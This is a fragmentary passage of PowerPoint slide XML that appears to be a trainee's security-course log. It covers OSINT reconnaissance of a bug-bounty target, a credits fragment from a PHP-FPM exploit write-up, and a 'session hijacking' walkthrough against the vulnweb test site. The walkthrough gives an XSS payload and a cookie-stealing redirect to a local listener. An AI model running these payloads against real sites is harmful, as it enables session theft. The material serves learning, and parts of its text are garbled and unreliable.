          <a:xfrm>
            <a:off x="3200400" y="1530350"/>
            <a:ext cx="11430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888"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>DAY -1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8E8CC3-B80F-FFC3-7CD5-51D6ACBB55F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2286000" y="1590675"/>
            <a:ext cx="6977063" cy="693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222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1888"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1888"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1903C8-B267-79FF-6282-F905017DAB15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="231775" y="2063750"/>
            <a:ext cx="5178425" cy="568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1888"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1888"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>                        Bug Bounty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1888"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Task-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Step -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Open a browser, then search bug bounty program </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Step -2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Domain name exploring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> Step -3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>I choose Yahoo.com Domain name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Step -4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1888"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>osint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> frame work in another tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1888"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Step -5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Domain name - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> records - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> Dossier</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4" name="arrow.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7DBB1B4A-B179-5ECE-CF22-CED4EB32257B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="941388"/>
            <a:ext cx="5837238"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2238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="625"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>## Credits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Original anomaly discovered by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>[d90pwn](</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://twitter.com/d90pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.inioptions. Final php.ini options set is found by [beched]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="1F4E79"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://twitter.com/ahack ru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a: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5" name="arrow.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609BDF-0E14-C972-3F3E-B431BAFDB204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468688" y="1000125"/>
            <a:ext cx="920750" cy="249238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" spc="-50">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>DAY -5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A5523E-29A2-E1D6-7228-CF785110ED9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1576388"/>
            <a:ext cx="5962650" cy="698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1675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Session hijacking attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Go to browser and search Crosssite scripting clean sheet Then select tags Then copy the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&lt;noscript&gt;&lt;img title="&lt;/noscript&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/noscript&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Then take a domain name and search it in new tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Then paste the code in that site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&lt;noscript&gt;&lt;img title="&lt;/noscript&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/noscript&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Then you will get a popup raised and gives 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>After that again search for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>That code this time remove alert(1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>And replace it by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>windows.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://127.0.0.1:1337/?cookie='+document.cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1BA713-68E6-97D1-3D5F-624CB9E67CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908050" y="8631238"/>
            <a:ext cx="61913" cy="88900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="550">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i</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4" name="arrow.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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B97BDB82-73D1-FF5F-9FDF-745FB37812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225" y="5734050"/>
            <a:ext cx="5946775"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF63554-67BA-2AC3-BF83-ADB95215E4FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="1785938"/>
            <a:ext cx="60960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263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{734B8065-95D8-8DB5-0F67-857B5619ED2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="2179638"/>
            <a:ext cx="5929313"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2250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1263"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&lt;script&gt;alert("windows.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://127.0.0.1:1337/?cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" baseline="30000">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>+do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> cument.cookie'") ;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>We got in popup A testphp.vulnweb.com + 2 testphp.vulnweb.com says</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>windows.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://127.0.0.1:1337/?cookie=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="3363"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>,+document.cookie,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6" name="arrow.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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{103F9D37-69F5-A034-D73E-40890343B2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821288"/>
            <a:ext cx="6500192"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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B49077A2-B67D-C05C-AB2B-C6D1683BA0D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1011238" y="1047750"/>
            <a:ext cx="3097212" cy="741090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="382A2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1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EBDDDB"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>O' A testphp.vulnweb.com +    ©</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25604" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCEB978-2FE8-DF19-2914-FEA859C56BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="2657202"/>
            <a:ext cx="4339952" cy="2530748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="382A2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263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EBDDDB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>testphp.vulnweb.com says</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1488"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CDBCBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>windows. location=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CDBCBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://127.0.0.1:1337/?cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CDBCBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CDBCBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CDBCBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7EF125-A491-EA26-5B28-8D849F1C674A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005013" y="6681788"/>
            <a:ext cx="1463675" cy="142875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="840"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="840"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="850" b="1">
                <a:solidFill>
                  <a:srgbClr val="495560"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Acunetix Web Vulnerability Si</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25606" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E36F5A35-EF9C-996F-573D-60BC3B4CAC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1709738" y="7342188"/>
            <a:ext cx="19383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a:solidFill>
                  <a:srgbClr val="2B475F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie='+document.cooki</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25607" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C426A7-93E2-5376-6B24-3D4645A8F405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1311275" y="6235700"/>
            <a:ext cx="395288"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5675"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>etix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1AD992B-BFE7-0532-8D09-4FE6073170E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2925763" y="6419850"/>
            <a:ext cx="103187" cy="96838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="840"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
